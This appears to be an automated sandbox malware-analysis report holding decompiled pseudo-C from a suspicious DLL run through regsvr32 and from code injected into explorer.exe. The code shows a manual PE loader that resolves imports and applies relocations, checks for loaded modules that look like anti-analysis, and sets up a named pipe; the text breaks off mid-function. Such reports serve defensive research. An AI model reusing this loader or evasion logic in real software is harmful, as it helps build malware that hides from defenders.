				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x1001e688; // 0x2de0590
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t14 = E1000B7A8(0x1001b9c8,  &_v516) + 1; // 0x1
					E1000A86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E1000A471( &_v556, _t298);
					 *0x1001e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						 *0x1001e680 = E1000E1BC(0x1001b9cc, _t299);
						 *_t337 = 0x610;
						_t124 = E100095E1(0x1001b9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x1001e688; // 0x2de0590
						_t127 = E100092E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E100085D5( &_v612);
						_t130 = E1000B269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E1000861A( &_v616, 0xfffffffe);
						_t133 =  *0x1001e688; // 0x2de0590
						_t22 = _t133 + 0x114; // 0x2de06a4
						E10004A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x1001e688; // 0x2de0590
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0x1001e680; // 0x0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564);
							}
							_v620 = _v620 & 0x00000000;
							E1000E2C6(_t353,  &_v576);
							_pop(_t262);
							_t142 =  *0x1001e6b4; // 0x2e5fc48
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E1000E2C6(_t353,  &_v588);
								_t235 =  *0x1001e6b4; // 0x2e5fc48
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x1001e73c;
							if( *0x1001e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x1001e680; // 0x0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x1001e688; // 0x2de0590
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E100049A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x1001e684; // 0x2e5faa0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x1001e688; // 0x2de0590
											_t184 = E1000FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E10008604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E1000109A(_t262, 0x148);
													_t305 =  *0x1001e688; // 0x2de0590
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E1000902D(_t271,  &_v572);
													_t272 =  *0x1001e688; // 0x2de0590
													_t188 = E100060DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x1001e688; // 0x2de0590
														__eflags = _t200 + 0x1020;
														E10009640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E100085D5( &_v636);
														E1000A911(_t333, 0, 0xbb8, 1);
														E1000861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E1000861A( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E100049A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x1001e684; // 0x2e5faa0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E10008604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E100095E1(_t278, 0x32d);
										_t280 =  *0x1001e688; // 0x2de0590
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E10009640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E100085D5( &_v636);
										E1000A911(_t249, 0, 0xbb8, 1);
										E1000861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E100095E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x1001e688; // 0x2de0590
								_t329 = E100092E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E1000B269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x1001e684; // 0x2e5faa0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E1000861A( &_v612, 0xfffffffe);
								}
								E100085D5( &_v616);
								_t150 =  *0x1001e688; // 0x2de0590
								lstrcpynW(_t150 + 0x438,  *0x1001e740, 0x105);
								_t153 =  *0x1001e688; // 0x2de0590
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x1001e738, 0x105);
								_t331 =  *0x1001e688; // 0x2de0590
								_t117 = _t331 + 0x228; // 0x2de07b8
								 *((intOrPtr*)(_t331 + 0x434)) = E10008FBE(_t117, __eflags);
								E1000861A(0x1001e740, 0xfffffffe);
								E1000861A(0x1001e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E100095C7(0x6e2);
				_v616 = _t250;
				_t326 = E100095C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E100085C2( &_v616);
					_t122 = E100085C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}

0x10004d6d
0x10004d73
0x10004d79
0x10004d7e
0x10004d8c
0x10004d8f
0x10004dee
0x10004e00
0x10004e03
0x10004e0a
0x10004e0f
0x10004e14
0x10004e1b
0x10004e25
0x10004e2c
0x10004e37
0x10004e3c
0x10004e43
0x10004e49
0x10004e4b
0x10004e4c
0x10004e50
0x10004e5b
0x10004e60
0x10004e69
0x10004e6e
0x10004e76
0x10004e7d
0x10004e7e
0x10004e80
0x10004e9c
0x10004e9f
0x10004e9f
0x10004ea8
0x10004ead
0x10004ebd
0x10004ec5
0x10004eca
0x10004ed0
0x10004ed3
0x10004ed9
0x10004ef8
0x10004efe
0x10004eff
0x10004f00
0x10004f01
0x10004f02
0x10004f03
0x10004f0d
0x10004f11
0x10004f16
0x10004f19
0x10004f1b
0x10004f2d
0x10004f2d
0x10004f2f
0x10004f3b
0x10004f40
0x10004f46
0x10004f4f
0x10004f52
0x10004f54
0x10004f5f
0x10004f64
0x10004f69
0x10004f6e
0x10004f6e
0x10004f71
0x10004f78
0x00000000
0x10004f7e
0x10004f7e
0x10004f83
0x10004f87
0x10004f89
0x10004f8c
0x10004f8e
0x10004f94
0x10004f94
0x10004f8e
0x10004f96
0x10004f9b
0x10004fa1
0x10004fa3
0x00000000
0x10004fa9
0x10004fa9
0x10004fad
0x10005082
0x10005088
0x1000508e
0x10005099
0x1000509a
0x1000509b
0x1000509c
0x100050a2
0x100050a7
0x100050ad
0x100050b5
0x100050bb
0x100050be
0x100050cd
0x100050d4
0x100050d7
0x100050e4
0x100050e8
0x100050f5
0x100050fa
0x100050fd
0x100050ff
0x10005110
0x10005112
0x10005116
0x10005117
0x10005119
0x10005124
0x10005129
0x10005136
0x1000513a
0x1000513b
0x1000513d
0x10005145
0x10005146
0x1000514b
0x10005163
0x10005168
0x1000516b
0x1000516f
0x10005171
0x10005184
0x1000518e
0x10005192
0x1000519a
0x1000519b
0x100051a3
0x100051a4
0x100051a9
0x100051b5
0x100051bf
0x100051d1
0x100051dd
0x100051e2
0x100051e2
0x100051ec
0x100051f2
0x100051f2
0x10005119
0x100050ff
0x00000000
0x10005088
0x10004fb3
0x10004fb6
0x00000000
0x00000000
0x10004fbc
0x10004fc7
0x10004fc8
0x10004fc9
0x10004fca
0x10004fd0
0x10004fd5
0x10004fe9
0x10004fee
0x10004ff2
0x10004ffd
0x10005006
0x10005008
0x1000500c
0x1000500d
0x1000500f
0x1000501a
0x10005020
0x10005032
0x10005035
0x10005038
0x10005045
0x1000504d
0x10005057
0x10005069
0x10005075
0x1000507a
0x00000000
0x1000500f
0x10004fa3
0x10004edb
0x10004edb
0x10004ee1
0x10004ee3
0x00000000
0x00000000
0x10004ee5
0x10004ee9
0x100051f3
0x100051f8
0x100051fe
0x10005200
0x10005201
0x10005205
0x10005215
0x1000521a
0x1000521e
0x10005220
0x10005224
0x10005229
0x1000522b
0x1000522d
0x10005233
0x10005233
0x10005240
0x10005246
0x1000524c
0x10005251
0x1000526f
0x10005271
0x1000527d
0x1000527d
0x10005283
0x10005285
0x1000528b
0x1000529d
0x100052a3
0x100052af
0x100052b7
0x100052b7
0x100052b7
0x100052b9
0x100052bf
0x100052bf
0x10004eef
0x10004ef2
0x00000000
0x00000000
0x00000000
0x10004ef2
0x10004ed9
0x10004e1d
0x10004e1d
0x00000000
0x10004e1d
0x10004d9b
0x10004da2
0x10004dab
0x10004dad
0x10004db3
0x10004dc4
0x10004dcd
0x10004dcd
0x10004dd9
0x10004de2
0x10004de7
0x10004dec
0x00000000
0x00000000
0x10004dec

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC0
GetModuleHandleA.KERNEL32(00000000), ref: 10004DC7
lstrcpynW.KERNEL32(02DE0158,00000105), ref: 1000526F
lstrcpynW.KERNEL32(02DE0368,00000105), ref: 10005283

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: HandleModulelstrcpyn
String ID:
API String ID: 3430401031-0
Opcode ID: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
Instruction ID: cc48400d40a66e7674bcd18edc35038107661711004b249490cc292a5082b98a
Opcode Fuzzy Hash: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
Instruction Fuzzy Hash: A7E1CC71608341AFF340CF64CC86F6A73E9EB88390F454A29F584DB2D5EB75EA448B52

Uniqueness

Uniqueness Score: -1.00%

Function 10012AEC, Relevance: 6.2, APIs: 4, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E10012AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}

0x10012afb
0x10012b01
0x10012b0a
0x10012b0d
0x10012b10
0x00000000
0x10012c01
0x10012c05
0x10012c07
0x10012c15
0x10012d33
0x10012d3c
0x10012d3f
0x10012d43
0x10012d49
0x10012d51
0x10012d51
0x10012d59
0x00000000
0x10012d64
0x10012c1b
0x10012c24
0x10012c32
0x10012c35
0x10012c52
0x10012c59
0x10012c6b
0x10012c6b
0x10012c72
0x10012c82
0x10012c9a
0x10012c84
0x10012c8c
0x10012c8c
0x10012c9d
0x10012ca1
0x10012cb1
0x10012cd4
0x10012ce6
0x10012cb3
0x10012cc7
0x10012cc7
0x10012cf0
0x10012d0c
0x10012cf2
0x10012d01
0x10012d01
0x10012d14
0x10012d1d
0x10012d1d
0x10012d2b
0x00000000
0x10012c74
0x10012c76
0x00000000
0x10012c76
0x10012c72
0x00000000
0x10012c35
0x10012b18
0x10012b26
0x10012b2b
0x10012b36
0x10012b39
0x10012b3d
0x10012b3f
0x10012b4f
0x10012b58
0x10012b61
0x10012b69
0x10012b72
0x10012b7d
0x10012b83
0x10012b86
0x10012b89
0x10012b90
0x10012b97
0x00000000
0x00000000
0x10012ba2
0x10012bb0
0x10012bbb
0x10012bc5
0x10012bdd
0x10012bea
0x10012bea
0x10012bc7
0x10012bd2
0x10012bd2
0x10012bf1
0x10012bf1
0x10012bf9
0x10012bf9
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 10012C4C
LoadLibraryA.KERNEL32(?), ref: 10012C65
GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CC1
GetProcAddress.KERNEL32(00000000,?), ref: 10012CE0

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
Instruction ID: 2edd54a6eb651874f6cc264e5dd0ce055865838d2197d7e71e48a8f46057b6f1
Opcode Fuzzy Hash: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
Instruction Fuzzy Hash: 62A168B5E00219DFCB40CFA8D881AADBBF1FF08354F108469E915AB351D734EA91CB64

Uniqueness

Uniqueness Score: -1.00%

Function 10001C68, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x1001e6dc; // 0x0
				_t13 = E1000A4BF(_t41, 0);
				while(_t13 < 0) {
					E1000980C( &_v28);
					_t43 =  *0x1001e6e0; // 0x0
					_t15 =  *0x1001e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x1001e684; // 0x2e5faa0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x1001e684; // 0x2e5faa0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x1001e6dc; // 0x0
						__eflags = 0;
						_t13 = E1000A4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x1001e6e8; // 0x0
				_v28 = _t20;
				_t22 = E1000A6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
					E1000980C(0x1001e6e0);
					_t64 = E10001A1B( &_v28, E10001226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x1001e760);
						_t51 = 0x27;
						E10009F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x1001e684; // 0x2e5faa0
				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
				_t48 =  *0x1001e6dc; // 0x0
				 *0x1001e6d0 = 0;
				E1000A4DB(_t48);
				E1000861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

0x10001c68
0x10001c75
0x10001c77
0x10001c7e
0x10001ce4
0x10001c8b
0x10001c90
0x10001c96
0x10001c9b
0x10001ca1
0x10001ca3
0x10001ca7
0x10001d15
0x10001d17
0x10001d99
0x10001d9f
0x10001d9f
0x10001ca9
0x10001cb1
0x10001cb1
0x10001cbd
0x10001cc3
0x10001cc5
0x00000000
0x00000000
0x10001cc7
0x10001cd1
0x10001cd7
0x10001cdd
0x10001cdf
0x00000000
0x10001cdf
0x10001cab
0x10001caf
0x00000000
0x00000000
0x00000000
0x10001caf
0x10001cee
0x10001cef
0x10001cf0
0x10001cf1
0x10001cf2
0x10001cf7
0x10001d01
0x10001d06
0x10001d0e
0x10001d29
0x10001d2c
0x10001d36
0x10001d41
0x10001d54
0x10001d56
0x10001d58
0x10001d5a
0x10001d5b
0x10001d63
0x10001d64
0x10001d6a
0x10001d10
0x10001d10
0x10001d10
0x10001d6b
0x10001d76
0x10001d79
0x10001d7f
0x10001d85
0x10001d90
0x10001d97
0x00000000

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
Instruction ID: 912c1b93fe30e14ebce55579952f4eddc1cb52f7c5d97e94b218bb2c615be3ff
Opcode Fuzzy Hash: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
Instruction Fuzzy Hash: C831C036604264AFF344DFA4DCC5C6E77A9FB983D0B904A2AF941C32A5DA30ED048B52

Uniqueness

Uniqueness Score: -1.00%

Function 10001B2D, Relevance: 6.1, APIs: 4, Instructions: 97
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E10001B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x1001e6f4; // 0x0
				_t12 = E1000A4BF(_t38, 0);
				while(_t12 < 0) {
					E1000980C( &_v28);
					_t40 =  *0x1001e700; // 0x0
					_t14 =  *0x1001e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x1001e684; // 0x2e5faa0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x1001e684; // 0x2e5faa0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x1001e6f4; // 0x0
								__eflags = 0;
								_t12 = E1000A4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E1000980C(0x1001e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x1001e6e8; // 0x0
				_v28 = _t24;
				_t61 = E10001A1B( &_v28, E1000131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x1001e760);
					_t48 = 0x27;
					E10009F06(_t48);
				}
				if(_v24 != 0) {
					E10006890( &_v24);
				}
				_t26 =  *0x1001e684; // 0x2e5faa0
				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
				_t28 =  *0x1001e758; // 0x0
				 *0x1001e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x1001e6f4; // 0x0
				 *0x1001e758 =  !=  ? 1 : _t28;
				E1000A4DB(_t46);
				_t15 = _t61;
				goto L12;
			}

0x10001b2d
0x10001b33
0x10001b41
0x10001baf
0x10001b4e
0x10001b53
0x10001b59
0x10001b5e
0x10001b64
0x10001b66
0x10001b6a
0x10001c64
0x10001c64
0x10001b70
0x10001b70
0x10001b7c
0x10001b7c
0x10001b88
0x10001b8e
0x10001b90
0x00000000
0x10001b92
0x10001b92
0x10001b9c
0x10001ba2
0x10001ba8
0x10001baa
0x00000000
0x10001baa
0x10001b72
0x10001b72
0x10001b76
0x00000000
0x00000000
0x00000000
0x00000000
0x10001b76
0x10001b70
0x10001c5d
0x10001c63
0x10001c63
0x10001bb8
0x10001bcc
0x10001bcf
0x10001bd9
0x10001be5
0x10001bef
0x10001bf0
0x10001bf1
0x10001bf2
0x10001bf7
0x10001c00
0x10001c04
0x10001c06
0x10001c07
0x10001c0f
0x10001c10
0x10001c16
0x10001c1b
0x10001c21
0x10001c21
0x10001c26
0x10001c31
0x10001c34
0x10001c3c
0x10001c48
0x10001c4b
0x10001c51
0x10001c56
0x10001c5b
0x00000000

APIs

GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
GetCurrentThread.KERNEL32(00000000), ref: 10001BCF
GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
DuplicateHandle.KERNEL32 ref: 10001BD9

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: Current$Process$DuplicateHandleThread
String ID:
API String ID: 3566409357-0
Opcode ID: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
Instruction ID: 6a0302f5f4fd7db6b8bd225124d86af098f07b21623db759acfbad22203cc7cf
Opcode Fuzzy Hash: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
Instruction Fuzzy Hash: 50319C756083A19FF744DF64CCD886E77A9EB983D0B418968F601872A6DB30EC44CB52

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 1016 Parent PID: 1176 explorer.exeCOMMON

Executed Functions

Function 000831C2, Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E000831C2(void* __edx, void* __eflags) {
				CHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				signed int _t10;
				intOrPtr _t11;
				intOrPtr _t12;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t22;
				intOrPtr _t28;
				void* _t38;
				CHAR* _t40;

				_t38 = __edx;
				_t28 =  *0x9e688; // 0xb0000
				_t10 = E0008C292( *((intOrPtr*)(_t28 + 0xac)), __eflags);
				_t40 = _t10;
				_v8 = _t40;
				if(_t40 != 0) {
					_t11 = E00088604(0x80000); // executed
					 *0x9e724 = _t11;
					__eflags = _t11;
					if(_t11 != 0) {
						_t12 = E0008BD10(); // executed
						_v16 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_push(0xc);
							_pop(0);
							_v12 = 1;
						}
						_v20 = 0;
						__eflags = 0;
						asm("sbb eax, eax");
						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
						 *0x9e674 = _t16;
						__eflags = _t16 - 0xffffffff;
						if(_t16 != 0xffffffff) {
